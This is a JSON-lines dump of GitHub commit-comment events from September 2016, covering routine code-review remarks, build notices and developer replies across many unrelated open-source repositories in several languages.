{"id":"4579689799","type":"CommitCommentEvent","actor":{"login":"uldisn"},"repo":{"name":"schmunk42/yii2-giiant"},"payload":{"comment":{"id":19070206,"position":null,"line":null,"path":null,"commit_id":"efcd0999422733cc32f6ddc71fe9364d435694d6","created_at":"2016-09-18T10:31:05Z","updated_at":"2016-09-18T10:31:05Z","body":"Why you do not like this functionality? Its work fine, when add related items!"}},"created_at":"2016-09-18T10:31:05Z"}
{"id":"4579691362","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"Silentlys/android_kernel_lenovo_msm8916"},"payload":{"comment":{"id":19070207,"position":null,"line":null,"path":null,"commit_id":"e877bc9c7dae34d5f39f8d5dc1b8bcda510255e3","created_at":"2016-09-18T10:32:14Z","updated_at":"2016-09-18T10:32:14Z","body":"gimme recovery.img i will give you twrp"}},"created_at":"2016-09-18T10:32:14Z"}
{"id":"4579692813","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19070208,"position":2,"line":89,"path":"configure.ac","commit_id":"30b71fbb7807730922f0699823eddfffd02dcba0","created_at":"2016-09-18T10:33:23Z","updated_at":"2016-09-18T10:33:23Z","body":"Doh: an ancient GCC, is why."}},"created_at":"2016-09-18T10:33:23Z"}
{"id":"4579695526","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19070211,"position":null,"line":null,"path":null,"commit_id":"4b0043ae7c92507d690eb4c4eb6249550d0891ff","created_at":"2016-09-18T10:35:45Z","updated_at":"2016-09-18T10:35:45Z","body":"It must be noted that with that we reduced the bench time of ca. a factor of 10..."}},"created_at":"2016-09-18T10:35:45Z"}
{"id":"4579696533","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19070213,"position":13,"line":70,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialTextArea.java","commit_id":"cac8fcefce1b8d053dbfa77e9dfdf8339ddd5db5","created_at":"2016-09-18T10:36:37Z","updated_at":"2016-09-18T10:36:37Z","body":"Remove these, nothing is being called."}},"created_at":"2016-09-18T10:36:37Z"}
{"id":"4579696626","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19070214,"position":18,"line":75,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialTextArea.java","commit_id":"cac8fcefce1b8d053dbfa77e9dfdf8339ddd5db5","created_at":"2016-09-18T10:36:42Z","updated_at":"2016-09-18T10:36:42Z","body":"Remove these, nothing is being called."}},"created_at":"2016-09-18T10:36:42Z"}
{"id":"4579696974","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"danbim/eventuate"},"payload":{"comment":{"id":19070215,"position":14,"line":143,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/EventsourcedProcessor.scala","commit_id":"8ff37811bb43b3ccd77ae29769f00736bf03ef96","created_at":"2016-09-18T10:36:59Z","updated_at":"2016-09-18T10:36:59Z","body":"This change should be rolled back as it may break processing consistency e.g. an application could resume processing from a position that is greater than the last processed position. In other words, an `EventsourcedProcessor` should not allow custom replay start positions. I think we should therefore\r\n\r\n```scala\r\noverride final def replayFromSequenceNr: Option[Long] = None\r\n```\r\n\r\nin `EventsourcedWriter`."}},"created_at":"2016-09-18T10:36:59Z"}
{"id":"4579697332","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"danbim/eventuate"},"payload":{"comment":{"id":19070217,"position":3,"line":32,"path":"eventuate-core/src/test/scala/com/rbmhtechnology/eventuate/EventsourcedWriterSpec.scala","commit_id":"8ff37811bb43b3ccd77ae29769f00736bf03ef96","created_at":"2016-09-18T10:37:15Z","updated_at":"2016-09-18T10:37:15Z","body":"Changes in `EventsourcedWriterSpec` should be rolled back as a consequence of https://github.com/danbim/eventuate/commit/8ff37811bb43b3ccd77ae29769f00736bf03ef96#commitcomment-19070215"}},"created_at":"2016-09-18T10:37:15Z"}
{"id":"4579697574","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19070218,"position":13,"line":70,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialTextArea.java","commit_id":"cac8fcefce1b8d053dbfa77e9dfdf8339ddd5db5","created_at":"2016-09-18T10:37:27Z","updated_at":"2016-09-18T10:37:27Z","body":"ok "}},"created_at":"2016-09-18T10:37:27Z"}
{"id":"4579697672","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19070219,"position":18,"line":75,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialTextArea.java","commit_id":"cac8fcefce1b8d053dbfa77e9dfdf8339ddd5db5","created_at":"2016-09-18T10:37:32Z","updated_at":"2016-09-18T10:37:32Z","body":"ok"}},"created_at":"2016-09-18T10:37:32Z"}
{"id":"4579699529","type":"CommitCommentEvent","actor":{"login":"itachi1706"},"repo":{"name":"itachi1706/CheesecakeUtilities"},"payload":{"comment":{"id":19070220,"position":28,"line":226,"path":"app/src/main/java/com/itachi1706/cheesecakeutilities/Modules/FanfictionCompactor/FanfictionCompactorActivity.java","commit_id":"952da2c9f7e30189c131b92654d254822bf072dc","created_at":"2016-09-18T10:39:05Z","updated_at":"2016-09-18T10:39:05Z","body":"Why is this still commented out god damnit"}},"created_at":"2016-09-18T10:39:05Z"}
{"id":"4579700338","type":"CommitCommentEvent","actor":{"login":"AayushRd7"},"repo":{"name":"AOSParadox/local_aosparadox"},"payload":{"comment":{"id":19070221,"position":null,"line":null,"path":null,"commit_id":"48e310e7ca1a5c866dce4ccc2dd5b06bd338e9d0","created_at":"2016-09-18T10:39:41Z","updated_at":"2016-09-18T10:39:41Z","body":"Yu Needs Aosp-caf 'N' :+1: \r\n\r\n#stay_AOSP"}},"created_at":"2016-09-18T10:39:41Z"}
{"id":"4579700421","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19070222,"position":null,"line":null,"path":null,"commit_id":"2c5b9080ad485953ecfea5770102d1b241e991c9","created_at":"2016-09-18T10:39:46Z","updated_at":"2016-09-18T10:39:46Z","body":"This is not the way it should be done in the ideal world... It is much better to report such things to Alpine Image issue tracker. Have you done this? Could you, please, do this?"}},"created_at":"2016-09-18T10:39:46Z"}
{"id":"4579700580","type":"CommitCommentEvent","actor":{"login":"dahui58"},"repo":{"name":"dahui58/SSRPG"},"payload":{"comment":{"id":19070223,"position":null,"line":null,"path":null,"commit_id":"493801b9c9bad85922996e2c9724928af036a480","created_at":"2016-09-18T10:39:53Z","updated_at":"2016-09-18T10:39:53Z","body":"Also fixed indentation. Will need to refactor much of this into a UI class and also Map module class"}},"created_at":"2016-09-18T10:39:53Z"}
{"id":"4579700681","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19070224,"position":null,"line":null,"path":null,"commit_id":"42efefd31ef74eb83c65ee8bff24bbd810fc53e3","created_at":"2016-09-18T10:39:58Z","updated_at":"2016-09-18T10:39:58Z","body":"IMHO, it makes more sense to have `VOLUME`, `EXPOSE`, `ENTRYPOINT` and `CMD` at the end of the Dockerfile."}},"created_at":"2016-09-18T10:39:58Z"}
{"id":"4579701470","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"danbim/eventuate"},"payload":{"comment":{"id":19070225,"position":7,"line":195,"path":"src/sphinx/reference/event-sourcing.rst","commit_id":"8ff37811bb43b3ccd77ae29769f00736bf03ef96","created_at":"2016-09-18T10:40:35Z","updated_at":"2016-09-18T10:40:35Z","body":"> event-sourced actor \r\n\r\nevent-sourced actor or view"}},"created_at":"2016-09-18T10:40:35Z"}
{"id":"4579701730","type":"CommitCommentEvent","actor":{"login":"ayantugsel"},"repo":{"name":"ayantugsel/notes"},"payload":{"comment":{"id":19070226,"position":14,"line":32,"path":"README.md","commit_id":"a30b980e3720c3655fbccd37b4b88a388a7f5b33","created_at":"2016-09-18T10:40:45Z","updated_at":"2016-09-18T10:40:45Z","body":"Switch statements : \r\n''''function caseInSwitch(val) {\r\n  var answer = \"\";\r\n  // Only change code below this line\r\n  switch (val) {\r\n    case 1:\r\n      answer=\"alpha\";\r\n      break;\r\n    case 2:\r\n      answer =\"beta\";\r\n      break;\r\n    case 3:\r\n      answer=\"gamma\";\r\n      break;\r\n    case 4:\r\n      answer=\"delta\";\r\n      break;\r\n  }\r\n  \r\n  \r\n  // Only change code above this line  \r\n  return answer;  \r\n}\r\n\r\n// Change this value to test\r\ncaseInSwitch(1);\r\n"}},"created_at":"2016-09-18T10:40:45Z"}
{"id":"4579701765","type":"CommitCommentEvent","actor":{"login":"raduborza"},"repo":{"name":"dexonline/dexonline"},"payload":{"comment":{"id":19070227,"position":null,"line":null,"path":null,"commit_id":"c7c68577dce82d1461bfeb086c505259d2d09544","created_at":"2016-09-18T10:40:46Z","updated_at":"2016-09-18T10:40:46Z","body":"Eu o folosesc la imaginile fără copyright (pe 20 septembrie e un Nicolae\nGrigorescu).\n\nR.\n\n2016-09-18 10:08 GMT+03:00 Cătălin Frâncu <notifications@github.com>:\n\n> Mișto! La ce o vom folosi? :-)\n>\n> O optimizez eu cu optipng.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dexonline/dexonline/commit/c7c68577dce82d1461bfeb086c505259d2d09544#commitcomment-19069646>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGP-7m0VTMriisWcxgYQ1id0VFUZAUnfks5qrONjgaJpZM4J_0xC>\n> .\n>\n\n\n\n-- \nToate cele bune,\nRadu Borza\n"}},"created_at":"2016-09-18T10:40:46Z"}
{"id":"4579701781","type":"CommitCommentEvent","actor":{"login":"VictorDuma"},"repo":{"name":"VictorDuma/kvant_site"},"payload":{"comment":{"id":19070228,"position":null,"line":null,"path":null,"commit_id":"839500a1735401dbe08937f25645c6467db8f35e","created_at":"2016-09-18T10:40:47Z","updated_at":"2016-09-18T10:40:47Z","body":"1"}},"created_at":"2016-09-18T10:40:47Z"}
{"id":"4579701881","type":"CommitCommentEvent","actor":{"login":"DarkWav"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19070229,"position":null,"line":null,"path":null,"commit_id":"7d2e9fdcd1e92db4e8295db22f5a7b70ef1944cf","created_at":"2016-09-18T10:40:52Z","updated_at":"2016-09-18T10:40:52Z","body":"Nope thats useless..."}},"created_at":"2016-09-18T10:40:52Z"}
{"id":"4579702248","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"danbim/eventuate"},"payload":{"comment":{"id":19070230,"position":12,"line":200,"path":"src/sphinx/reference/event-sourcing.rst","commit_id":"8ff37811bb43b3ccd77ae29769f00736bf03ef96","created_at":"2016-09-18T10:41:10Z","updated_at":"2016-09-18T10:41:10Z","body":"This paragraph can be removed when implementing https://github.com/danbim/eventuate/commit/8ff37811bb43b3ccd77ae29769f00736bf03ef96#commitcomment-19070215"}},"created_at":"2016-09-18T10:41:10Z"}
{"id":"4579702267","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19070231,"position":null,"line":null,"path":null,"commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-18T10:41:11Z","updated_at":"2016-09-18T10:41:11Z","body":"What do you get from console.log(elements)? I suspect that it's not an array so you can't iterate through it.\r\n\r\nYou could also try to see if you could restrict it to a div / span that contains the checkboxes, instead of the entire document. So if you have `<div id='columnControls'> <input type='checkbox'/> ... </div>`, you could try `$('#columnControls').find('input')`.\r\n\r\nYou can also use selectors, e.g. `$('#columnControls').find('[type=checkbox]')` (from googling \"select all checkboxes jquery\").\r\n\r\nAlso, based on one of the examples in https://api.jquery.com/find/, I believe you could do something like this:\r\n\r\n```\r\nvar colIndexes = {\r\n    \"address\": [0],\r\n    ...\r\n}\r\n\r\n$('#columnControls).find('[type=checkbox]').change(function() {\r\n    if($(this).prop('checked')) {\r\n        inst.getPlugin('hiddenColumns').showColumn(colIndexes[$(this).prop('name')]);\r\n    } else {\r\n        ...\r\n    }\r\n});\r\n\r\n<input type=\"checkbox\" name=\"address\">\r\n```\r\nOr another more elegant way! "}},"created_at":"2016-09-18T10:41:11Z"}
{"id":"4579704125","type":"CommitCommentEvent","actor":{"login":"Crissov"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19070232,"position":26,"line":762,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T10:42:43Z","updated_at":"2016-09-18T10:42:43Z","body":"`normal` = `100` obviously means that it’s 100% (of whatever) and hence the usual range is from 80% through 120%. Better use actual percentages, so authors don’t expect `100`, `200`, …"}},"created_at":"2016-09-18T10:42:43Z"}
{"id":"4579704506","type":"CommitCommentEvent","actor":{"login":"aDevilInMe"},"repo":{"name":"ThePhD/lua-bench"},"payload":{"comment":{"id":19070234,"position":null,"line":null,"path":null,"commit_id":"a7925e830a7bb3e7ce6d2d4ca9c5cd5b3ddbc048","created_at":"2016-09-18T10:43:00Z","updated_at":"2016-09-18T10:43:00Z","body":"If you want to specify that a library only supports something because another library does it a certain way then that is fine, yet you should make this stipulation explicit. There is no \"standard\" way of accessing a C++ member variable in Lua, because Lua has no notion of C++ classes. Personally I do not care how Luabind did things, the library is a unsupported, slow and now dead binding. If you want to persists that the Luabind way is the only correct way then for example Sol2 does not, or only partially, support construction of a user type; this is because it uses a 'new' function. "}},"created_at":"2016-09-18T10:43:00Z"}
{"id":"4579705037","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19070235,"position":null,"line":null,"path":null,"commit_id":"67a1e56d283460188befa0303b5e1a910c21333f","created_at":"2016-09-18T10:43:26Z","updated_at":"2016-09-18T10:43:26Z","body":"Fixes #10 "}},"created_at":"2016-09-18T10:43:26Z"}
{"id":"4579705700","type":"CommitCommentEvent","actor":{"login":"upgle"},"repo":{"name":"mintakoh/PuzzleBoggle"},"payload":{"comment":{"id":19070236,"position":null,"line":null,"path":null,"commit_id":"eb434fe523d14213752716e9022367a1052518b5","created_at":"2016-09-18T10:43:58Z","updated_at":"2016-09-18T10:43:58Z","body":"ㅎㅇ"}},"created_at":"2016-09-18T10:43:58Z"}
{"id":"4579706054","type":"CommitCommentEvent","actor":{"login":"ewgraf"},"repo":{"name":"ewgraf/eroge-dopil"},"payload":{"comment":{"id":19070237,"position":null,"line":null,"path":null,"commit_id":"4bd0da028916b96ea0baafcdf76af2349781c54f","created_at":"2016-09-18T10:44:14Z","updated_at":"2016-09-18T10:44:14Z","body":"Парни, я пытался встать на последнюю ревизию и случайно смёрджил патч в главную ветку. Кто-нибудь знает как сделать обратно?"}},"created_at":"2016-09-18T10:44:14Z"}
{"id":"4579707087","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19070240,"position":null,"line":null,"path":null,"commit_id":"4b0043ae7c92507d690eb4c4eb6249550d0891ff","created_at":"2016-09-18T10:45:07Z","updated_at":"2016-09-18T10:45:07Z","body":"@Stefano80 you have a very fast machine! On mine it is more or less similar, anyhow the resulting binary it has same performance.\r\n"}},"created_at":"2016-09-18T10:45:07Z"}
{"id":"4579709621","type":"CommitCommentEvent","actor":{"login":"ovr"},"repo":{"name":"ovr/phpsa"},"payload":{"comment":{"id":19070245,"position":null,"line":null,"path":null,"commit_id":"558809a395899532c9e57f81f91a3dd61afc0983","created_at":"2016-09-18T10:47:06Z","updated_at":"2016-09-18T10:47:06Z","body":"@ddmler @K-Phoen Okey not a problem, I will do it\r\n"}},"created_at":"2016-09-18T10:47:06Z"}
{"id":"4579712180","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"Roboe/android_kernel_fairphone_fp2"},"payload":{"comment":{"id":19070251,"position":null,"line":null,"path":null,"commit_id":"f2a065870b15fab208a5b5e36272ea29b1d63712","created_at":"2016-09-18T10:48:52Z","updated_at":"2016-09-18T10:48:52Z","body":"It's pretty common that Fairphone commit messages have a DO NOT MERGE title ^^ 10/10 software too"}},"created_at":"2016-09-18T10:48:52Z"}
{"id":"4579712376","type":"CommitCommentEvent","actor":{"login":"HeinrichReimer"},"repo":{"name":"aitorvs/android-inquiry"},"payload":{"comment":{"id":19070252,"position":5,"line":0,"path":"library/src/main/java/com/heinrichreimer/inquiry/Inquiry.java","commit_id":"02374219baf49bf88b27f366cdea15e004a9ea8c","created_at":"2016-09-18T10:49:02Z","updated_at":"2016-09-18T10:49:02Z","body":"\"call Inqiry.deinit() first!\""}},"created_at":"2016-09-18T10:49:02Z"}
{"id":"4579712648","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19070253,"position":null,"line":null,"path":null,"commit_id":"a644de6322271fd23da23a343b136f3e52c638fc","created_at":"2016-09-18T10:49:12Z","updated_at":"2016-09-18T10:49:12Z","body":"@thewonderidiot: I had finally been so confused that I submitted the problem to Hugh Blair-Smith, and he pointed out the same thing as you ... or rather pointed out that TS in Block 1 is supposed to skip on overflow (which I obviously knew, but had just never occurred to me in this particular instance, no matter how long I looked at it!), and so the OCT 17 has a perfect right to be there.  The implication would be that there should always have been overflow by the time the TS instruction preceding the OCT 17 had been reached.  Anyway, I'm looking into that right now, and feel pretty stupid for having not been able to see it for myself.\r\n\r\nWhen you stop and reflect on the Block 1 instruction set (which I'm sure you haven't had the opportunity to do), and see that there's no single-instruction way to either load the accumulator from erasable or to write the accumulator to erasable without potentially unwanted side-effects, you have to wonder how anyone could ever have written a program of any significance in it at all without it being peppered by side effects that had been temporarily forgotten."}},"created_at":"2016-09-18T10:49:12Z"}
{"id":"4579715948","type":"CommitCommentEvent","actor":{"login":"joschiwald"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19070256,"position":null,"line":null,"path":null,"commit_id":"b5035582b656df780e8ebeeb3647288bf1be8256","created_at":"2016-09-18T10:51:24Z","updated_at":"2016-09-18T10:51:24Z","body":"yes i think so"}},"created_at":"2016-09-18T10:51:24Z"}
{"id":"4579718969","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070260,"position":89,"line":98,"path":"index.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T10:53:52Z","updated_at":"2016-09-18T10:53:52Z","body":"Почему у вас размечен только 1 слайд? в макете их два"}},"created_at":"2016-09-18T10:53:52Z"}
{"id":"4579719162","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19070261,"position":null,"line":null,"path":null,"commit_id":"def0404a78d1d14152bfcc9381c6b5b9cd276192","created_at":"2016-09-18T10:54:02Z","updated_at":"2016-09-18T10:54:02Z","body":"Fixes #3 "}},"created_at":"2016-09-18T10:54:02Z"}
{"id":"4579721349","type":"CommitCommentEvent","actor":{"login":"schmunk42"},"repo":{"name":"schmunk42/yii2-giiant"},"payload":{"comment":{"id":19070263,"position":null,"line":null,"path":null,"commit_id":"efcd0999422733cc32f6ddc71fe9364d435694d6","created_at":"2016-09-18T10:55:43Z","updated_at":"2016-09-18T10:55:43Z","body":"Tests were no longer passing.\r\n\r\nI also need to simplyfy the way of returnUrl handling."}},"created_at":"2016-09-18T10:55:43Z"}
{"id":"4579721923","type":"CommitCommentEvent","actor":{"login":"Akshay-Kumar"},"repo":{"name":"Akshay-Kumar/Source-Code"},"payload":{"comment":{"id":19070264,"position":null,"line":null,"path":null,"commit_id":"325ad9c5fb72b1847e56c96aeb6f92f840735bfc","created_at":"2016-09-18T10:56:09Z","updated_at":"2016-09-18T10:56:09Z","body":"updated readme file."}},"created_at":"2016-09-18T10:56:09Z"}
{"id":"4579724272","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"danbim/eventuate"},"payload":{"comment":{"id":19070268,"position":5,"line":42,"path":"eventuate-core/src/test/scala/com/rbmhtechnology/eventuate/EventsourcedProcessorSpec.scala","commit_id":"8ff37811bb43b3ccd77ae29769f00736bf03ef96","created_at":"2016-09-18T10:58:04Z","updated_at":"2016-09-18T10:58:04Z","body":"Changes in `EventsourcedProcessorSpec` can be rolled back as a consequence of https://github.com/danbim/eventuate/commit/8ff37811bb43b3ccd77ae29769f00736bf03ef96#commitcomment-19070215 "}},"created_at":"2016-09-18T10:58:04Z"}
{"id":"4579724838","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19070269,"position":58,"line":184,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T10:58:30Z","updated_at":"2016-09-18T10:58:30Z","body":"Yes"}},"created_at":"2016-09-18T10:58:30Z"}
{"id":"4579725268","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"danbim/eventuate"},"payload":{"comment":{"id":19070271,"position":7,"line":115,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/EventsourcedWriter.scala","commit_id":"8ff37811bb43b3ccd77ae29769f00736bf03ef96","created_at":"2016-09-18T10:58:54Z","updated_at":"2016-09-18T10:58:54Z","body":"API doc changes can be rolled back as a consequence of https://github.com/danbim/eventuate/commit/8ff37811bb43b3ccd77ae29769f00736bf03ef96#commitcomment-19070215"}},"created_at":"2016-09-18T10:58:54Z"}
{"id":"4579725487","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19070272,"position":null,"line":null,"path":null,"commit_id":"e65b2e6eae16a547bcd2a0018234b91708399e35","created_at":"2016-09-18T10:59:06Z","updated_at":"2016-09-18T10:59:06Z","body":"You have not removed \"edge\" repo, instead, you have made an \"unstable\" image because you allowed it to use edge for all packages instead of just PostgreSQL."}},"created_at":"2016-09-18T10:59:06Z"}
{"id":"4579725889","type":"CommitCommentEvent","actor":{"login":"xinran1900"},"repo":{"name":"utom/sketch-measure"},"payload":{"comment":{"id":19070274,"position":null,"line":null,"path":null,"commit_id":"6ece36484fd8e18c7f6474e501dba5d5a3d951dc","created_at":"2016-09-18T10:59:26Z","updated_at":"2016-09-18T10:59:26Z","body":"标注\"properties\" & \"设置切图\"都不能用呢。"}},"created_at":"2016-09-18T10:59:26Z"}
{"id":"4579726819","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19070276,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-18T11:00:11Z","updated_at":"2016-09-18T11:00:11Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.171](http://build.clear-measure.com/viewLog.html?buildId=10470&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-18T11:00:11Z"}
{"id":"4579727773","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070277,"position":null,"line":null,"path":null,"commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T11:00:48Z","updated_at":"2016-09-18T11:00:48Z","body":"У вас не соблюден принцип именования классов БЭМ, если хотите его использовать - то нужно пройтись по всем классам и посмотреть где переименовать. "}},"created_at":"2016-09-18T11:00:48Z"}
{"id":"4579730343","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19070282,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-18T11:02:37Z","updated_at":"2016-09-18T11:02:37Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.171](http://build.clear-measure.com/viewLog.html?buildId=10470&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:26"}},"created_at":"2016-09-18T11:02:37Z"}
{"id":"4579738696","type":"CommitCommentEvent","actor":{"login":"rutvik106"},"repo":{"name":"NANDITA19/KitchenApp"},"payload":{"comment":{"id":19070291,"position":28,"line":23,"path":"app/src/main/AndroidManifest.xml","commit_id":"14852081e28c96f76f1c3a53f3777c4e75d0c327","created_at":"2016-09-18T11:08:20Z","updated_at":"2016-09-18T11:08:20Z","body":"also make it available for landscape screens"}},"created_at":"2016-09-18T11:08:20Z"}
{"id":"4579742681","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070293,"position":70,"line":70,"path":"login.php","commit_id":"3cc67bd5f781f65e79c2a7474c7ddbc3adfebf16","created_at":"2016-09-18T11:11:33Z","updated_at":"2016-09-18T11:11:33Z","body":"これがモックになかった"}},"created_at":"2016-09-18T11:11:33Z"}
{"id":"4579744445","type":"CommitCommentEvent","actor":{"login":"KrisVos130"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":19070296,"position":null,"line":null,"path":null,"commit_id":"c2272cd30eeea406e94525feb1851f7b90176f1f","created_at":"2016-09-18T11:12:54Z","updated_at":"2016-09-18T11:12:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;700KXuBe&#x2F;10-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-18T11:12:54Z"}
{"id":"4579744621","type":"CommitCommentEvent","actor":{"login":"KrisVos130"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":19070300,"position":null,"line":null,"path":null,"commit_id":"fa1aebbdc83af57fd5d970939052fce0ca69e088","created_at":"2016-09-18T11:13:02Z","updated_at":"2016-09-18T11:13:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;700KXuBe&#x2F;10-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-18T11:13:02Z"}
{"id":"4579744641","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19070301,"position":74,"line":74,"path":"login.php","commit_id":"3cc67bd5f781f65e79c2a7474c7ddbc3adfebf16","created_at":"2016-09-18T11:13:02Z","updated_at":"2016-09-18T11:13:02Z","body":"会員登録もないので追加"}},"created_at":"2016-09-18T11:13:02Z"}
{"id":"4579744811","type":"CommitCommentEvent","actor":{"login":"KrisVos130"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":19070302,"position":null,"line":null,"path":null,"commit_id":"df8f003ac8d1cc1b61f58f83ced6578560c338b4","created_at":"2016-09-18T11:13:09Z","updated_at":"2016-09-18T11:13:09Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;700KXuBe&#x2F;10-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-18T11:13:09Z"}
{"id":"4579744885","type":"CommitCommentEvent","actor":{"login":"RasheedaAlexander"},"repo":{"name":"RasheedaAlexander/jam"},"payload":{"comment":{"id":19070303,"position":null,"line":null,"path":null,"commit_id":"0b879df11d0bbb30ca444c7853d195bf461b0991","created_at":"2016-09-18T11:13:11Z","updated_at":"2016-09-18T11:13:11Z","body":"RC7 is actually the most recent update of Angular 2, not RC6."}},"created_at":"2016-09-18T11:13:11Z"}
{"id":"4579745712","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ZIM555/android_device_samsung_fortunave3g"},"payload":{"comment":{"id":19070304,"position":null,"line":null,"path":null,"commit_id":"65734d6f1e3b88318eb95adee96a9204a40e4edb","created_at":"2016-09-18T11:13:49Z","updated_at":"2016-09-18T11:13:49Z","body":"@zim555 I know you don't support hawaii SOC anymore. But since you had work on it since 4.4, i need some help from you, related to frameworks_av for android N. omxcodec.cpp is deprecated in android N. Can you help me to fix video encoding/decoding? I have video playback(encoding/decoding) partially working,but not completely (maybe because it's missing omxcodec patches?)\r\nLink for repo : https://github.com/google-aosp/android_frameworks_av/commits/7.0"}},"created_at":"2016-09-18T11:13:49Z"}
{"id":"4579748258","type":"CommitCommentEvent","actor":{"login":"ewgraf"},"repo":{"name":"ewgraf/eroge-dopil"},"payload":{"comment":{"id":19070310,"position":null,"line":null,"path":null,"commit_id":"4bd0da028916b96ea0baafcdf76af2349781c54f","created_at":"2016-09-18T11:15:42Z","updated_at":"2016-09-18T11:15:42Z","body":"Откатил."}},"created_at":"2016-09-18T11:15:42Z"}
